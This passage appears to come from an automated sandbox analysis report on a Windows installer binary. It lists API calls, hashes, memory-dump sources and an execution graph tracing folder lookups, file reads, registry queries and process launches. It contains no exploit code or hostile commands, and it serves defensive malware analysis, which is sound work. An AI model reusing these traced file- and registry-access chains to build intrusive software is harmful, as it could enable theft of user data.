                                        • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                        APIs
                                        • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                        • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: PrivateProfileStringlstrcmp
                                        • String ID: !N~
                                        • API String ID: 623250636-529124213
                                        • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                        • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                        • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                        • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                        APIs
                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                        • CloseHandle.KERNEL32(?), ref: 00405C71
                                        Strings
                                        • Error launching installer, xrefs: 00405C48
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: CloseCreateHandleProcess
                                        • String ID: Error launching installer
                                        • API String ID: 3712363035-66219284
                                        • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                        • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                        • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                        • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                        APIs
                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                        • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: CloseHandlelstrlenwvsprintf
                                        • String ID: RMDir: RemoveDirectory invalid input("")
                                        • API String ID: 3509786178-2769509956
                                        • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                        • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                        • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                        • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                        APIs
                                        • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                        • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                        • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                        • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: lstrlen$CharNextlstrcmpi
                                        • String ID:
                                        • API String ID: 190613189-0
                                        • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                        • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                        • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                        • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                        Execution Graph

                                        Execution Coverage:4.1%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:11.2%
                                        Total number of Nodes:2000
                                        Total number of Limit Nodes:125
                                        execution_graph 173447 1422fa2 173448 1422fb0 173447->173448 173449 1422fda 173447->173449 173475 14c32ac 173448->173475 173461 14c55dd 173449->173461 173452 1422fe9 173455 1423007 173452->173455 173457 1423029 __Wcsxfrm 173452->173457 173484 14e5109 173452->173484 173453 1422fb9 173479 14c3304 173453->173479 173487 14e5124 173455->173487 173493 14d88d1 173457->173493 173460 142309e 173462 14c55e9 __EH_prolog3 173461->173462 173463 14c32ac std::_Lockit::_Lockit EnterCriticalSection 173462->173463 173464 14c55f3 std::locale::_Locimp::_Locimp_Addfac 173463->173464 173465 14c569d 173464->173465 173471 14c5621 173464->173471 173500 14c3442 173465->173500 173467 14c3304 std::_Lockit::~_Lockit LeaveCriticalSection 173468 14c5697 messages 173467->173468 173468->173452 173471->173467 173476 14c32c2 173475->173476 173477 14c32bb 173475->173477 173476->173477 173507 143a9e0 EnterCriticalSection 173476->173507 173477->173453 173480 14c330e 173479->173480 173481 14e59f8 173479->173481 173482 14c3321 173480->173482 173508 143aa30 LeaveCriticalSection 173480->173508 173481->173449 173482->173449 173509 14ec235 173484->173509 173492 14ed212 __dosmaperr collate 173487->173492 173488 14ed250 173516 14e50f6 12 API calls __dosmaperr 173488->173516 173490 14ed23b RtlAllocateHeap 173491 14ed24e 173490->173491 173490->173492 173491->173457 173492->173488 173492->173490 173494 14d88dc IsProcessorFeaturePresent 173493->173494 173495 14d88da 173493->173495 173497 14d8f5a 173494->173497 173495->173460 173517 14d8f1e SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 173497->173517 173499 14d903d 173499->173460 173501 14c3450 Concurrency::cancel_current_task 173500->173501 173504 14da47e 173501->173504 173503 14c345e 173505 14da4c8 RaiseException 173504->173505 173506 14da498 173504->173506 173505->173503 173506->173505 173507->173477 173508->173482 173510 14e5121 173509->173510 173511 14ec240 RtlFreeHeap 173509->173511 173510->173455 173511->173510 173512 14ec255 GetLastError 173511->173512 173513 14ec262 __dosmaperr 173512->173513 173515 14e50f6 12 API calls __dosmaperr 173513->173515 173515->173510 173516->173491 173517->173499 173518 141e900 173520 141e943 173518->173520 173520->173520 173521 141eadc _vcomp_fork 173520->173521 173522 1411550 173520->173522 173523 14e5124 __Wcsxfrm 13 API calls 173522->173523 173524 1411578 __Getcvt 173523->173524 173525 1411594 SHGetFolderPathA 173524->173525 173526 14115bb SHGetFolderPathA 173524->173526 173527 14116eb 173525->173527 173529 14115a6 lstrcatA CreateFileA 173525->173529 173526->173527 173526->173529 173530 14d88d1 _ValidateLocalCookies 5 API calls 173527->173530 173529->173527 173531 141160c GetFileSize 173529->173531 173532 14116fa 173530->173532 173531->173527 173533 141161f 173531->173533 173532->173520 173534 14e5124 __Wcsxfrm 13 API calls 173533->173534 173535 1411625 __Getcvt 173534->173535 173536 141163a ReadFile 173535->173536 173536->173527 173537 1411651 CloseHandle 173536->173537 173538 14e5124 __Wcsxfrm 13 API calls 173537->173538 173539 141165e __Getcvt 173538->173539 173539->173527 173540 14116fe 173539->173540 173541 14e5109 ~collate 12 API calls 173540->173541 173542 1411725 lstrcatA lstrlenA 173541->173542 173543 14e5109 ~collate 12 API calls 173542->173543 173544 1411745 173543->173544 173545 14d88d1 _ValidateLocalCookies 5 API calls 173544->173545 173546 141175a 173545->173546 173546->173520 173547 144d7e0 173548 144d824 173547->173548 173593 143ac50 173548->173593 173550 144d938 173551 14d88d1 _ValidateLocalCookies 5 API calls 173550->173551 173552 144d94d 173551->173552 173553 144daed 173554 143ac50 13 API calls 173553->173554 173584 144db1f 173553->173584 173561 144db01 __Getcvt 173554->173561 173555 144d8c3 __Getcvt 173555->173550 173555->173553 173556 143ac50 13 API calls 173555->173556 173557 144d922 173556->173557 173558 144d951 173557->173558 173559 144d932 173557->173559 173568 144d9c8 173558->173568 173582 144d95a __Wcsxfrm 173558->173582 173654 143b080 173559->173654 173561->173584 173598 1447430 173561->173598 173562 144db3b 173563 143b080 12 API calls 173562->173563 173565 144db41 173563->173565 173567 143b080 12 API calls 173565->173567 173580 144db4a 173567->173580 173569 143b080 12 API calls 173568->173569 173570 144d9ce 173569->173570 173572 143b080 12 API calls 173570->173572 173571 144dbeb __Getcvt 173581 144dc86 173571->173581 173571->173584 173641 143fb00 173571->173641 173575 144d9d7 173572->173575 173573 144da9a 173578 143b080 12 API calls 173573->173578 173574 14d88d1 _ValidateLocalCookies 5 API calls 173577 144db77 173574->173577 173576 14d88d1 _ValidateLocalCookies 5 API calls 173575->173576 173579 144d9e9 173576->173579 173578->173553 173580->173574 173581->173584 173659 14469e0 18 API calls 2 library calls 173581->173659 173582->173573 173586 144db7b 173582->173586 173584->173562 173584->173580 173658 1446c40 19 API calls 173584->173658 173585 143b080 12 API calls 173587 144dbab 173585->173587 173586->173585 173588 143b080 12 API calls 173587->173588 173589 144dbb4 173588->173589 173590 14d88d1 _ValidateLocalCookies 5 API calls 173589->173590 173591 144dbc9 173590->173591 173594 143ad71 173593->173594 173595 143ac65 173593->173595 173594->173555 173595->173594 173660 143a741 173595->173660 173596 143ad0c 173596->173555 173600 1447484 173598->173600 173599 14476f6 173602 143ac50 13 API calls 173599->173602 173612 14474cf __Wcsxfrm 173599->173612 173600->173599 173601 14474b4 173600->173601 173600->173612 173690 143b3d0 173601->173690 173621 1447718 173602->173621 173603 143ac50 13 API calls 173604 144753c 173603->173604 173607 14479e3 173604->173607 173625 1447549 __Getcvt __Wcsxfrm 173604->173625 173606 14479f0 173608 14d88d1 _ValidateLocalCookies 5 API calls 173606->173608 173607->173606 173610 143b080 12 API calls 173607->173610 173609 1447a05 173608->173609 173609->173571 173610->173606 173611 1447630 173639 1447676 173611->173639 173663 1441c50 173611->173663 173612->173603 173612->173606 173614 14477c7 173614->173612 173618 14477d6 173614->173618 173615 1447810 173617 143b080 12 API calls 173615->173617 173616 1447894 173619 1447977 173616->173619 173635 1447901 173616->173635 173620 1447818 173617->173620 173626 143b080 12 API calls 173618->173626 173696 1443540 12 API calls 173619->173696 173622 14d88d1 _ValidateLocalCookies 5 API calls 173620->173622 173621->173606 173621->173614 173621->173615 173621->173621 173624 144782a 173622->173624 173624->173571 173625->173611 173629 143b080 12 API calls 173625->173629 173628 14477fa 173626->173628 173627 144799a 173630 143b080 12 API calls 173627->173630 173631 14d88d1 _ValidateLocalCookies 5 API calls 173628->173631 173629->173611 173632 14479a0 173630->173632 173633 144780c 173631->173633 173634 14d88d1 _ValidateLocalCookies 5 API calls 173632->173634 173633->173571 173636 14479b3 173634->173636 173637 14d88d1 _ValidateLocalCookies 5 API calls 173635->173637 173636->173571 173638 14479df 173637->173638 173638->173571 173639->173619 173695 14469e0 18 API calls 2 library calls 173639->173695 173650 143fb44 __Wcsxfrm 173641->173650 173642 143fbe1 ReadFile 173643 143fc8a 173642->173643 173642->173650 173644 143fcbb __Getcvt 173643->173644 173645 143fb6d __Wcsxfrm 173643->173645 173648 14d88d1 _ValidateLocalCookies 5 API calls 173644->173648 173646 14d88d1 _ValidateLocalCookies 5 API calls 173645->173646 173647 143fb8c 173646->173647 173647->173581 173651 143fcde 173648->173651 173649 143fc57 173652 14d88d1 _ValidateLocalCookies 5 API calls 173649->173652 173650->173642 173650->173643 173650->173645 173650->173649 173651->173581 173653 143fc86 173652->173653 173653->173581 173655 143b0f4 173654->173655 173656 143b08f 173654->173656 173655->173550 173656->173655 173657 14e5109 12 API calls 173656->173657 173657->173655 173658->173562 173659->173584 173661 14e5124 __Wcsxfrm 13 API calls 173660->173661 173662 143a74c 173661->173662 173662->173596 173683 1441c90 __Getcvt 173663->173683 173664 14420a1 173668 14d88d1 _ValidateLocalCookies 5 API calls 173664->173668 173665 1442098 173667 143b080 12 API calls 173665->173667 173666 143ac50 13 API calls 173666->173683 173667->173664 173669 14420b9 173668->173669 173669->173639 173670 143b080 12 API calls 173670->173683 173671 1441f5d 173672 143b080 12 API calls 173671->173672 173674 1441f63 173672->173674 173673 1441e55 CreateFileW 173673->173683 173675 143b080 12 API calls 173674->173675 173676 1441f6f 173675->173676 173677 14d88d1 _ValidateLocalCookies 5 API calls 173676->173677 173678 1441f87 173677->173678 173678->173639 173679 1441fbd 173680 143b080 12 API calls 173679->173680 173681 1441fda 173680->173681 173682 143b080 12 API calls 173681->173682 173686 1441fe6 173682->173686 173683->173664 173683->173665 173683->173666 173683->173670 173683->173671 173683->173673 173683->173679 173684 1441f8b 173683->173684 173685 14d88d1 _ValidateLocalCookies 5 API calls 173684->173685 173688 1441fb9 173685->173688 173687 14d88d1 _ValidateLocalCookies 5 API calls 173686->173687 173689 1442094 173687->173689 173688->173639 173689->173639 173692 143b3db 173690->173692 173691 143ac50 13 API calls 173693 143b415 173691->173693 173692->173691 173694 143b3e1 173692->173694 173693->173612 173694->173612 173695->173616 173696->173627 173697 1462ea3 173698 1462eab 173697->173698 173702 1463d7b 173698->173702 173708 1462ed4 173698->173708 173723 144e850 173698->173723 173701 14625b3 173737 145b350 19 API calls __Getcvt 173701->173737 173702->173701 173742 143b5f0 18 API calls 173702->173742 173703 1463032 173740 143b5a0 13 API calls __Wcsxfrm 173703->173740 173706 146303e 173716 146067c __Wcsxfrm 173706->173716 173741 14786c0 13 API calls 173706->173741 173708->173702 173708->173716 173739 143b120 12 API calls 173708->173739 173709 14625f3 173711 1462621 173709->173711 173738 14786c0 13 API calls 173709->173738 173714 14d88d1 _ValidateLocalCookies 5 API calls 173711->173714 173715 146265e 173714->173715 173716->173701 173716->173702 173717 146628b 173716->173717 173719 1458a40 19 API calls 173716->173719 173720 1464200 173716->173720 173722 1462594 173716->173722 173743 143b5f0 18 API calls 173717->173743 173719->173716 173721 14662aa 173736 143b5f0 18 API calls 173722->173736 173728 144e870 173723->173728 173724 144ead4 173726 144e8aa 173724->173726 173772 14493e0 13 API calls __Getcvt 173724->173772 173726->173708 173728->173724 173728->173726 173731 144ea17 173728->173731 173744 144e3c0 173728->173744 173768 144e780 19 API calls __Getcvt 173728->173768 173769 1448150 19 API calls 173728->173769 173731->173724 173731->173726 173732 144ead6 173731->173732 173733 144eacf 173731->173733 173771 1448ae0 18 API calls _ValidateLocalCookies 173732->173771 173770 1448df0 19 API calls 173733->173770 173736->173701 173737->173709 173738->173711 173739->173703 173740->173706 173741->173716 173742->173701 173743->173721 173773 1447c60 173744->173773 173746 144e3d2 173747 144e69e 173746->173747 173795 14481d0 173746->173795 173747->173728 173749 144e4c9 173749->173747 173832 1448150 19 API calls 173749->173832 173751 144e766 173751->173728 173752 144e56c 173752->173749 173760 144e5f7 173752->173760 173753 144e533 173755 144e557 173753->173755 173756 144e542 173753->173756 173754 144e3eb 173754->173747 173754->173749 173754->173752 173754->173753 173828 1448150 19 API calls 173755->173828 173827 1448150 19 API calls 173756->173827 173759 144e563 173759->173728 173829 1448150 19 API calls 173760->173829 173761 144e54e 173761->173728 173763 144e619 173764 144e634 173763->173764 173830 1443540 12 API calls 173763->173830 173831 14469e0 18 API calls 2 library calls 173764->173831 173767 144e648 173767->173728 173768->173728 173769->173728 173770->173724 173771->173724 173772->173726 173780 1447c88 173773->173780 173774 14d88d1 _ValidateLocalCookies 5 API calls 173775 144814a 173774->173775 173775->173746 173776 1448115 173836 14450f0 12 API calls 173776->173836 173777 1447fec 173790 1447e86 173777->173790 173835 144b4b0 18 API calls 173777->173835 173780->173776 173780->173777 173781 1447cf1 173780->173781 173780->173790 173791 14480d6 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 173780->173791 173792 1447d10 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 173780->173792 173833 14450f0 12 API calls 173781->173833 173782 1448120 173784 14d88d1 _ValidateLocalCookies 5 API calls 173782->173784 173785 144812f 173784->173785 173785->173746 173786 1447cfd 173787 14d88d1 _ValidateLocalCookies 5 API calls 173786->173787 173788 1447d0c 173787->173788 173788->173746 173790->173776 173790->173791 173791->173774 173792->173776 173792->173790 173793 1447f5f 173792->173793 173794 143fb00 6 API calls 173792->173794 173793->173790 173834 1446470 5 API calls 2 library calls 173793->173834 173794->173793 173796 144820d 173795->173796 173797 144825d 173796->173797 173798 144822f 173796->173798 173800 1448264 173797->173800 173817 143ac50 13 API calls 173797->173817 173819 1448500 173797->173819 173821 1448311 __Getcvt 173797->173821 173799 14d88d1 _ValidateLocalCookies 5 API calls 173798->173799 173801 1448259 173799->173801 173802 1448581 173800->173802 173805 144859b 173800->173805 173800->173819 173801->173754 173804 14d88d1 _ValidateLocalCookies 5 API calls 173802->173804 173807 1448597 173804->173807 173808 1448622 173805->173808 173805->173819 173822 14485d9 173805->173822 173806 14486f4 173809 14d88d1 _ValidateLocalCookies 5 API calls 173806->173809 173807->173754 173812 1448634 173808->173812 173808->173819 173810 144870a 173809->173810 173810->173754 173811 1448652 173842 1445090 13 API calls 173811->173842 173812->173811 173816 144865b __Getcvt 173812->173816 173841 1442a00 13 API calls __Getcvt 173812->173841 173820 14d88d1 _ValidateLocalCookies 5 API calls 173816->173820 173817->173821 173843 1448150 19 API calls 173819->173843 173823 144868d 173820->173823 173821->173800 173824 1448417 173821->173824 173822->173819 173837 1446160 173822->173837 173823->173754 173825 14d88d1 _ValidateLocalCookies 5 API calls 173824->173825 173826 144842d 173825->173826 173826->173754 173827->173761 173828->173759 173829->173763 173830->173764 173831->173767 173832->173751 173833->173786 173834->173777 173835->173777 173836->173782 173838 14461ea 173837->173838 173839 144619b 173837->173839 173840 143fb00 6 API calls 173838->173840 173839->173816 173839->173819 173840->173839 173841->173811 173842->173816 173843->173806 173844 1479920 173845 1479942 173844->173845 173849 147994c 173844->173849 173846 1479977 __Wcsxfrm 173845->173846 173847 143b3d0 13 API calls 173845->173847 173845->173849 173846->173849 173850 1479a7f 173846->173850 173853 143b470 173846->173853 173847->173846 173850->173849 173851 143b080 12 API calls 173850->173851 173852 1479b11 173851->173852 173854 143b489 173853->173854 173866 143b50c 173853->173866 173855 143b4a2 173854->173855 173856 143b48d 173854->173856 173859 143b4ba 173855->173859 173862 143b55d 173855->173862 173857 143b3d0 13 API calls 173856->173857 173858 143b498 173857->173858 173858->173850 173860 143b4d2 173859->173860 173863 143b3d0 13 API calls 173859->173863 173860->173850 173861 143b566 173861->173850 173862->173861 173869 143b1b0 13 API calls 173862->173869 173865 143b4e4 __Wcsxfrm 173863->173865 173865->173866 173867 143b080 12 API calls 173865->173867 173866->173850 173868 143b551 173867->173868 173868->173850 173869->173866 173870 1418689 173872 1418690 __Getcvt 173870->173872 173871 1418910 RegCloseKey 173873 141891c 173871->173873 173883 14188e6 _AnonymousOriginator 173872->173883 173979 14234b0 173872->173979 173875 14d88d1 _ValidateLocalCookies 5 API calls 173873->173875 173877 1418936 173875->173877 173878 14234b0 25 API calls 173879 1418756 RegGetValueW 173878->173879 173881 14187ae 173879->173881 173884 141884d _AnonymousOriginator 173879->173884 173997 14247c0 173881->173997 173883->173871 173884->173883 173886 141893a 173884->173886 173885 14187d9 __Getcvt 174002 1422e30 173885->174002 173992 14e4fe0 173886->173992 173980 14234ff 173979->173980 173987 142350f 173980->173987 174015 14029b0 12 API calls __Init_thread_footer 173980->174015 173982 14235e8 174019 1402880 RaiseException CallUnexpected 173982->174019 173985 14235b0 173991 141873b 173985->173991 174018 1402880 RaiseException CallUnexpected 173985->174018 173987->173982 173987->173985 174016 1425670 12 API calls 3 library calls 173987->174016 173989 142359f 174017 1425670 12 API calls 3 library calls 173989->174017 173991->173878 174020 14e4f1c 13 API calls messages 173992->174020 173994 14e4fef 174021 14e4ffd IsProcessorFeaturePresent 173994->174021 173996 14e4ffc 173998 14247de CatchIt 173997->173998 173999 1424810 __Wcsxfrm 173997->173999 173998->173885 174000 14248a3 _AnonymousOriginator 173999->174000 174001 14e4fe0 messages 13 API calls 173999->174001 174000->173885 174001->174000 174031 14c6e99 174002->174031 174004 1422e8d 174041 14d8ada 174004->174041 174006 1422ed2 __Getcvt 174007 14c32ac std::_Lockit::_Lockit EnterCriticalSection 174006->174007 174008 1422f01 174007->174008 174051 14c6f99 174008->174051 174014 1422f7f 174015->173987 174016->173989 174017->173985 174020->173994 174022 14e5009 174021->174022 174025 14e4dd4 174022->174025 174026 14e4df0 __Getcvt CallUnexpected 174025->174026 174027 14e4e1c IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 174026->174027 174030 14e4eed CallUnexpected 174027->174030 174028 14d88d1 _ValidateLocalCookies 5 API calls 174029 14e4f0b GetCurrentProcess TerminateProcess 174028->174029 174029->173996 174030->174028 174032 14c6ea5 __EH_prolog3 174031->174032 174033 14c32ac std::_Lockit::_Lockit EnterCriticalSection 174032->174033 174034 14c6eb0 174033->174034 174040 14c6ee1 174034->174040 174083 14c702e 27 API calls 2 library calls 174034->174083 174036 14c6ec3 std::locale::_Setgloballocale 174084 1423780 174036->174084 174037 14c3304 std::_Lockit::~_Lockit LeaveCriticalSection 174038 14c6f21 messages 174037->174038 174038->174004 174040->174037 174043 14d8adf collate 174041->174043 174042 14e5124 __Wcsxfrm 13 API calls 174042->174043 174043->174042 174044 14d8af9 174043->174044 174046 1401bc0 174043->174046 174044->174006 174045 14d8b05 174045->174045 174046->174045 174047 14da47e CallUnexpected RaiseException 174046->174047 174048 1401bdc 174047->174048 174091 14da21c 174048->174091 174052 14c6fa5 174051->174052 174053 1423780 std::_Locinfo::_Locinfo_ctor 13 API calls 174052->174053 174054 14c6fbd 174053->174054 174055 1423780 std::_Locinfo::_Locinfo_ctor 13 API calls 174054->174055 174056 1422f49 174055->174056 174057 14c70de 174056->174057 174058 14c70f1 __Getcvt 174057->174058 174100 14e60d9 174058->174100 174066 1422f55 174067 1402350 174066->174067 174068 140237b std::_Locinfo::_Locinfo_dtor 174067->174068 174069 140238b 174068->174069 174070 14e5109 ~collate 12 API calls 174068->174070 174071 14023a2 174069->174071 174072 14e5109 ~collate 12 API calls 174069->174072 174070->174069 174073 14e5109 ~collate 12 API calls 174071->174073 174075 14023b9 174071->174075 174072->174071 174073->174075 174074 14023e7 174079 14023fe 174074->174079 174080 14e5109 ~collate 12 API calls 174074->174080 174076 14e5109 ~collate 12 API calls 174075->174076 174077 14023d0 174075->174077 174076->174077 174077->174074 174078 14e5109 ~collate 12 API calls 174077->174078 174078->174074 174081 14c3304 std::_Lockit::~_Lockit LeaveCriticalSection 174079->174081 174080->174079 174082 140240f 174081->174082 174082->174014 174083->174036 174085 14237dc 174084->174085 174086 1423790 174084->174086 174085->174040 174087 14e5109 ~collate 12 API calls 174086->174087 174088 142379a 174086->174088 174087->174088 174088->174085 174088->174088 174089 14e5124 __Wcsxfrm 13 API calls 174088->174089 174090 14237bf __Wcsxfrm 174089->174090 174090->174040 174092 14da229 174091->174092 174098 1401c03 174091->174098 174092->174092 174093 14e5124 __Wcsxfrm 13 API calls 174092->174093 174092->174098 174094 14da246 174093->174094 174095 14da256 174094->174095 174099 14eb7e7 25 API calls 2 library calls 174094->174099 174097 14e5109 ~collate 12 API calls 174095->174097 174097->174098 174098->174006 174099->174095 174101 14e60e4 174100->174101 174113 14eb97c 174101->174113 174104 14e614a 174105 14e6155 174104->174105 174106 14eb97c __Toupper 28 API calls 174105->174106 174107 14c7100 174106->174107 174108 14e6123 174107->174108 174109 14e612e 174108->174109 174110 14eb97c __Toupper 28 API calls 174109->174110 174111 14c7108 174110->174111 174111->174066 174112 14e65cc 28 API calls __Toupper 174111->174112 174112->174066 174114 14eb98f 174113->174114 174116 14c70f9 174113->174116 174114->174116 174117 14f45e1 174114->174117 174116->174104 174119 14f45ed CallCatchBlock 174117->174119 174118 14f463c 174118->174116 174119->174118 174124 14f4662 12 API calls __Toupper 174119->174124 174121 14f4625 __Toupper 174121->174118 174125 14e899c 21 API calls CallUnexpected 174121->174125 174124->174121 174126 1498860 174138 149d770 174126->174138 174129 1498910 174130 143b3d0 13 API calls 174131 14988b2 __Getcvt 174130->174131 174131->174129 174150 14982b0 18 API calls 2 library calls 174131->174150 174133 14988ec 174151 1498690 18 API calls 2 library calls 174133->174151 174135 14988f7 174136 1498919 174135->174136 174152 1478960 13 API calls 174135->174152 174139 149d79a 174138->174139 174140 149d87e 174138->174140 174139->174140 174143 149d7e4 174139->174143 174144 1469fa0 19 API calls 174139->174144 174141 14d88d1 _ValidateLocalCookies 5 API calls 174140->174141 174142 1498888 174141->174142 174142->174129 174142->174130 174153 1469fa0 174143->174153 174144->174143 174147 1469fa0 19 API calls 174148 149d842 174147->174148 174148->174140 174149 1469fa0 19 API calls 174148->174149 174149->174140 174150->174133 174151->174135 174152->174129 174154 146a104 174153->174154 174155 1469fb7 174153->174155 174154->174140 174154->174147 174155->174154 174156 1469fa0 19 API calls 174155->174156 174158 149cd00 174155->174158 174156->174155 174159 149cd3a __Getcvt 174158->174159 174162 149d0ae 174158->174162 174161 1469fa0 19 API calls 174159->174161 174159->174162 174163 143b3d0 13 API calls 174159->174163 174175 149cf8b __Wcsxfrm 174159->174175 174176 149c950 174159->174176 174191 1478200 174159->174191 174195 143d020 174159->174195 174201 14982b0 18 API calls 2 library calls 174159->174201 174202 147b340 19 API calls 174159->174202 174161->174159 174162->174155 174163->174159 174168 146c9c0 13 API calls 174168->174175 174169 143b3d0 13 API calls 174169->174175 174170 146c7c0 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 174170->174175 174171 143b080 12 API calls 174171->174175 174172 143d020 18 API calls 174172->174175 174173 146c8c0 13 API calls 174173->174175 174174 146d200 13 API calls 174174->174175 174175->174162 174175->174168 174175->174169 174175->174170 174175->174171 174175->174172 174175->174173 174175->174174 174177 149c976 174176->174177 174178 149ca1b 174176->174178 174177->174178 174179 143b3d0 13 API calls 174177->174179 174178->174159 174181 149ca52 __Getcvt 174179->174181 174180 149ca72 174180->174159 174181->174180 174182 143b3d0 13 API calls 174181->174182 174185 149ca8b __Wcsxfrm 174181->174185 174182->174185 174183 149cb05 174183->174159 174184 1469fa0 19 API calls 174188 149cc1f 174184->174188 174185->174183 174185->174184 174187 149cc4a 174187->174159 174188->174187 174203 14982b0 18 API calls 2 library calls 174188->174203 174189 149cc85 174189->174178 